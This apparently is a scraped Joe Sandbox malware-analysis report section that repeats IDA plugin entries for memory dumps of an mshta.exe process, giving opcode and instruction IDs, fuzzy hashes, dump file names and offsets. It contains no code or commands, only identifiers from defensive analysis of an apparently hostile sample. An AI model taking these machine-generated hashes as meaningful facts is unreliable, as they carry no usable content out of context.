                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction ID: 8826e6109c14ddd74415a3c43d157ded885f4b0494f79e5d81eb4f2b4cb2e010
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C52CF31A08315EFDB18CF68C891ABAF7A5AF49314F364509E946BB241E734DC81CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction ID: 8826e6109c14ddd74415a3c43d157ded885f4b0494f79e5d81eb4f2b4cb2e010
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C52CF31A08315EFDB18CF68C891ABAF7A5AF49314F364509E946BB241E734DC81CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction ID: 8826e6109c14ddd74415a3c43d157ded885f4b0494f79e5d81eb4f2b4cb2e010
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C52CF31A08315EFDB18CF68C891ABAF7A5AF49314F364509E946BB241E734DC81CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction ID: 8826e6109c14ddd74415a3c43d157ded885f4b0494f79e5d81eb4f2b4cb2e010
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce0c5722e4a2801945d40b3be01acd83269c0b1ab3877206709c1aac30cfdc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C52CF31A08315EFDB18CF68C891ABAF7A5AF49314F364509E946BB241E734DC81CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E133000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ced3a82229fc190b334c228d7b2ace8d957324b722aefdbabda889cd7292869a
                                                                                                                                                                                                                                • Instruction ID: ab29fb5dd1d871e60da2c220650261b0925c957a50bdff0b81c5ca35a6f104bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced3a82229fc190b334c228d7b2ace8d957324b722aefdbabda889cd7292869a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15816531A04351EFE715CF28C881BB9BFE1AF49714F294059EA79AB381D7B49C84C7A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ced3a82229fc190b334c228d7b2ace8d957324b722aefdbabda889cd7292869a
                                                                                                                                                                                                                                • Instruction ID: ab29fb5dd1d871e60da2c220650261b0925c957a50bdff0b81c5ca35a6f104bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ced3a82229fc190b334c228d7b2ace8d957324b722aefdbabda889cd7292869a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15816531A04351EFE715CF28C881BB9BFE1AF49714F294059EA79AB381D7B49C84C7A1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction ID: 66b679bb6b4e9ad056aabe38ecd344a19997d4ea0904ade80e7c2e35c317268d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551C7306042048BEB24CF68C9D1EA9F7E1FF88350F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5dc04045701f6ebc15ba30d8510a92f2f2c8dd6e62275d28194151be8c8cf611
                                                                                                                                                                                                                                • Instruction ID: 62c308558dc3940b3e740400bcd0698c0efc1aac35bfecbd6c33e7b64fe2c4c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dc04045701f6ebc15ba30d8510a92f2f2c8dd6e62275d28194151be8c8cf611
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1515931A05364DFD725AFB8DC42BB9BBA4AF15704F35015EE905AB362C7B48C80CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction ID: 66b679bb6b4e9ad056aabe38ecd344a19997d4ea0904ade80e7c2e35c317268d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551C7306042048BEB24CF68C9D1EA9F7E1FF88350F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction ID: 66b679bb6b4e9ad056aabe38ecd344a19997d4ea0904ade80e7c2e35c317268d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551C7306042048BEB24CF68C9D1EA9F7E1FF88350F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E132000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5dc04045701f6ebc15ba30d8510a92f2f2c8dd6e62275d28194151be8c8cf611
                                                                                                                                                                                                                                • Instruction ID: 62c308558dc3940b3e740400bcd0698c0efc1aac35bfecbd6c33e7b64fe2c4c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dc04045701f6ebc15ba30d8510a92f2f2c8dd6e62275d28194151be8c8cf611
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1515931A05364DFD725AFB8DC42BB9BBA4AF15704F35015EE905AB362C7B48C80CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction ID: 66b679bb6b4e9ad056aabe38ecd344a19997d4ea0904ade80e7c2e35c317268d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370d9287fe8d1afd2a337f29b88693a075563b54e1521b5be4b48a379fa5edf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551C7306042048BEB24CF68C9D1EA9F7E1FF88350F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction ID: 047cac01be91af094a32fd240d79980d406cd3e8eafd7b34528980beaf36668b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9351C8316042008BEB24CF68C9D1EA9F7E1EF88354F758459E99AAB355EB31DCC1CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction ID: 047cac01be91af094a32fd240d79980d406cd3e8eafd7b34528980beaf36668b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9351C8316042008BEB24CF68C9D1EA9F7E1EF88354F758459E99AAB355EB31DCC1CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction ID: 047cac01be91af094a32fd240d79980d406cd3e8eafd7b34528980beaf36668b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9351C8316042008BEB24CF68C9D1EA9F7E1EF88354F758459E99AAB355EB31DCC1CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction ID: 047cac01be91af094a32fd240d79980d406cd3e8eafd7b34528980beaf36668b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4116922e2c144ca2963507095f12a9dacb9b4c5456fc4ded46db8ef5a73caaa9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9351C8316042008BEB24CF68C9D1EA9F7E1EF88354F758459E99AAB355EB31DCC1CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction ID: 83eb6f656cb6ecd739b1312688e8dccc736a0c2166a73fd75403e3e163cf936e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51B5316042008BEB24CF68C9D1EA9F3E1EF88354F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction ID: 83eb6f656cb6ecd739b1312688e8dccc736a0c2166a73fd75403e3e163cf936e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51B5316042008BEB24CF68C9D1EA9F3E1EF88354F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction ID: 83eb6f656cb6ecd739b1312688e8dccc736a0c2166a73fd75403e3e163cf936e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51B5316042008BEB24CF68C9D1EA9F3E1EF88354F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction ID: 83eb6f656cb6ecd739b1312688e8dccc736a0c2166a73fd75403e3e163cf936e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2870fb262542d15b7f728d7e2a057290cd733b3d9a64304fdda9d2e9c56a191e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C51B5316042008BEB24CF68C9D1EA9F3E1EF88354F758459E996AB355EB31DC81CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction ID: 6055021dcef362949ae3e33fccc456d73528775176be8a9fe4ff24f2ed5db4ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED41C5317042048BEB24CF68C9D1EA9F3E1EF88354F758459E99A9B355EB31DC82CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E135000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction ID: 6055021dcef362949ae3e33fccc456d73528775176be8a9fe4ff24f2ed5db4ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED41C5317042048BEB24CF68C9D1EA9F3E1EF88354F758459E99A9B355EB31DC82CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction ID: 6055021dcef362949ae3e33fccc456d73528775176be8a9fe4ff24f2ed5db4ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED41C5317042048BEB24CF68C9D1EA9F3E1EF88354F758459E99A9B355EB31DC82CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E139000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction ID: 6055021dcef362949ae3e33fccc456d73528775176be8a9fe4ff24f2ed5db4ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c675f6e35f4107823777ce7482f30296323394f02b6416c7dbbcd62541e270b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED41C5317042048BEB24CF68C9D1EA9F3E1EF88354F758459E99A9B355EB31DC82CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626755390.000000000E130000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E130000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e130000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a348606489c06de3c91e022f18dcc119439652931fbeda47a3e1401b8b9f19ec
                                                                                                                                                                                                                                • Instruction ID: 4c383b290d8fc19045a969336a45229d6d2b612bf23c108c370e4a79c5fe5514
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a348606489c06de3c91e022f18dcc119439652931fbeda47a3e1401b8b9f19ec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31E936A043209BEB248B68C851BF6B3D8EF49721F36055AED46A7380C764DC90CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2625573098.000000000E140000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7b9e3a725d6909e3b2c64cf6b57103eb88a9a23cea68856ca269cf29af13e0f1
                                                                                                                                                                                                                                • Instruction ID: 22dc5981c0138c8e4e0f1d4438f3ed078af33d2c0bab2dad1014750f58836a79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b9e3a725d6909e3b2c64cf6b57103eb88a9a23cea68856ca269cf29af13e0f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 882100B1905305EFC744CF6AD8819AAB7E4FF48210F215A1AEA16AB310E730DDC1CB92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2625573098.000000000E140000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E13E000, based on PE: false
                                                                                                                                                                                                                                • Associated: 00000000.00000003.2617568584.000000000E13E000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e13e000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 84a5d03321c5e37e4e9341036d4b229941ca92a7cb9f0b3c9d83a70d4b84d5e2
                                                                                                                                                                                                                                • Instruction ID: 22dc5981c0138c8e4e0f1d4438f3ed078af33d2c0bab2dad1014750f58836a79
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84a5d03321c5e37e4e9341036d4b229941ca92a7cb9f0b3c9d83a70d4b84d5e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 882100B1905305EFC744CF6AD8819AAB7E4FF48210F215A1AEA16AB310E730DDC1CB92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2618410772.000000000E135000.00000010.00000800.00020000.00000000.sdmp, Offset: 0E137000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_e135000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
                                                                                                                                                                                                                                • Instruction ID: 5f0ce95bfad60669b22bf3b0b02a96cf26b8a3bb034f5cbd948a68ccd702f64b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73449c105dd2200356b55bf4993da19d780e42c33f8dafb519e78ac52b66685b
